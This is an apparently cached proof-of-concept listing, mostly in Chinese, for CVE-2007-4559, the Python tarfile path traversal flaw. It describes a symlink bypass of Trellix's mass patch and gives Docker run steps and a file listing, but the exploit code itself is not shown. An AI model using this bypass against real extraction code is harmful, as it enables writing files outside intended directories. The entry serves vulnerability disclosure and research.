CVE-2007-4559 PoC — Python tarfile 模块路径遍历漏洞

Source

https://github.com/luigigubello/trellix-tarslip-patch-bypass

Associated Vulnerability

Title:Python tarfile 模块路径遍历漏洞 (CVE-2007-4559)
Description:Python是Python基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。 Python tarfile模块中的(1)extract和(2)extractall函数存在路径遍历漏洞，该漏洞允许用户辅助远程攻击者通过..TAR存档文件中文件名中的(dot dot)序列，该漏洞与CVE-2001-1267相关。

Description

Bypass for CVE-2007-4559 Trellix patch

Readme

# trellix-tarslip-patch-bypass

In 2023, Trellix announced [1] that they patched +61,000 open-source projects for [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559), an old path traversal vulnerability. Analyzing their patch, it's easy to notice that it can be bypassed using a symlink.

Symlink path traversal is an old technique, and it has also been shown in LiveOverflow's video [ Critical .zip vulnerabilities? - Zip Slip and ZipperDown](https://www.youtube.com/watch?v=Ry_yb5Oipq0).

[1] [Trellix Advanced Research Center Patches 61,000 Vulnerable Open-Source Projects](https://www.trellix.com/blogs/research/trellix-advanced-research-center-patches-vulnerable-open-source-projects/)

### PoC

```
docker build -t tarslip . 
docker run -it tarslip bash
python poc.py
cat evil.txt
```

File Snapshot


 [4.0K]  /data/pocs/4b06d88876c026fa96dde9348f1cb1211233583b
├── [ 160]  bypass.tar.gz
├── [  51]  Dockerfile
├── [1.1K]  poc.py
└── [ 803]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!